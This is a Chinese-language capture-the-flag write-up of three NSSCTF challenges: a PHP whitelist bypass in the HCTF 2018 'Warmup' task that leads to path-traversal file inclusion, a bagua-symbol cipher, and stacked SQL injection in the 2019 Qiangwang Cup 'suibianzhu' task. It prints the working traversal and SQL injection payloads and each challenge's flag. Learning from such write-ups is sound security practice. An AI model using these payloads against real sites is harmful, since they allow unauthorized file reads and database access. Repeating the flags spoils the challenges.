[HCTF 2018]Warmup

[HCTF 2018]Warmup

什么也没有就给了一个表情,那我们查看源码看看

发现了有一个source.php文件,打开看看

发现了代码审计,

复制代码
<?php
    // 高亮显示当前文件的内容,通常用于调试和查看源代码
    highlight_file(__FILE__);

    // 定义一个名为 emmm 的类
    class emmm
    {
        // 定义一个静态方法 checkFile,接受一个引用参数 $page
        public static function checkFile(&$page)
        {
            // 定义一个白名单数组,包含两个键值对
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];

            // 检查 $page 是否被设置且是否为字符串
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it"; // 如果条件不满足,输出 "you can't see it"
                return false; // 返回 false
            }

            // 检查 $page 是否在白名单中
            if (in_array($page, $whitelist)) {
                return true; // 如果在白名单中,返回 true
            }

            // 使用 mb_substr 从 $page 中提取子字符串,直到遇到问号(?)
            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            // 检查这个子字符串是否在白名单中
            if (in_array($_page, $whitelist)) {
                return true; // 如果在白名单中,返回 true
            }

            // 将 $page 进行 URL 解码
            $_page = urldecode($page);
            // 再次使用 mb_substr 提取子字符串,直到遇到问号(?)
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            // 检查这个子字符串是否在白名单中
            if (in_array($_page, $whitelist)) {
                return true; // 如果在白名单中,返回 true
            }

            // 如果上述所有检查都未通过,输出 "you can't see it"
            echo "you can't see it";
            return false; // 返回 false
        }
    }

    // 检查 $_REQUEST['file'] 是否不为空且为字符串,并且调用 emmm::checkFile 方法进行检查
    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        // 如果条件满足,包含该文件并退出脚本
        include $_REQUEST['file'];
        exit;
    } else {
        // 如果条件不满足,输出一张图片
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

查看一下hint.php文件

发现了flag再ffffllllaaaagggg中

因为我们当前的source.php一般是在html目录下,往上是www,var,然后到根目录,flag一般就放在根目录下面,这里还有一个hint.php?/或者source.php?/,因此需要返回四层才能到根目录 。

source.php/?file=hint.php?../../../../../ffffllllaaaagggg

得到flag

NSSCTF{3c195233-356a-41f1-9dc0-6342cb73563c}

[SWPUCTF 2021 新生赛]traditional

给了八卦图的密文,让我们解密

方法:

找到八卦图文对应的二进制编码,先转换成二进制编码再转换ASCII编码就得到flag了

我这里直接用的随波逐流:

NSSCTF{Da01sall}

[强网杯 2019]随便注

发现1'不行

发现1';可以

发现1';show databases;-- +可以查看数据库名

发现1';show tables;-- +可以查看表名

查看一群数字名的里面有没有flag,1';show columns from `1919810931114514`;

发现了falg这个字段名

1';handler `1919810931114514` open;handler `1919810931114514` read next;

NSSCTF{d9978321-a536-4c2e-916e-9c2be34ca27b}

相关推荐
Android 小码峰啊4 分钟前
Android Fresco 框架缓存模块源码深度剖析(二)
android
Yan-英杰5 分钟前
DeepSeek-R1模型现已登录亚马逊云科技
java·大数据·人工智能·科技·机器学习·云计算·deepseek
TDengine (老段)16 分钟前
TDengine 中的日志系统
java·大数据·数据库·物联网·时序数据库·tdengine·iotdb
不想学习!!18 分钟前
linux之进程控制
java·linux·服务器
nlog3n1 小时前
Java外观模式详解
java·开发语言·外观模式
Mryan20052 小时前
SpringBoot项目报错: 缺少 Validation
java·spring boot
大胃粥2 小时前
Android V app 冷启动(8) 动画结束
android
SnXJi_2 小时前
开源赋能,双驱协同:纷析云财务与进销存软件助力企业数字化转型
java·gitee·开源·开源软件
eternal__day2 小时前
第三期:深入理解 Spring Web MVC [特殊字符](数据传参+ 特殊字符处理 + 编码问题解析)
java·前端·spring·java-ee·mvc
ufo00l2 小时前
Kotlin在Android中有哪些重要的应用和知识点是需要学习或者重点关注的
android